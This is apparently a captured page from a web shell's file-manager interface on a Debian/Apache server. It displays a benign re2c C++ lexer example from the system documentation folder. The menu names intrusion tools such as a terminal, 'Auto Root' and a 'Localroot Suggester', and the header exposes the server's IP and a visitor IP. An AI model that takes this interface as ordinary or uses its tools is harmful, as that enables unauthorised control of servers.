Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.122
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
re2c /
examples /
input_custom /
simple /
Delete
Unzip
Name
Size
Permission
Date
Action
README
603
B
-rw-r--r--
2015-11-06 14:34
default.re
705
B
-rw-r--r--
2015-11-06 14:34
fgetc.re
998
B
-rw-r--r--
2015-11-06 14:34
istringstream.re
790
B
-rw-r--r--
2015-11-06 14:34
Save
Rename
#include <sstream> bool lex (std::istringstream & is, const std::streampos limit) { std::streampos marker; std::streampos ctxmarker; # define YYCTYPE char # define YYPEEK() is.peek () # define YYSKIP() is.ignore () # define YYBACKUP() marker = is.tellg () # define YYBACKUPCTX() ctxmarker = is.tellg () # define YYRESTORE() is.seekg (marker) # define YYRESTORECTX() is.seekg (ctxmarker) # define YYLESSTHAN(n) limit - is.tellg () < n # define YYFILL(n) {} /*!re2c "int buffer " / "[" [0-9]+ "]" { return true; } * { return false; } */ } int main () { const char buffer [] = "int buffer [1024]"; std::istringstream is (buffer); return !lex (is, sizeof (buffer)); }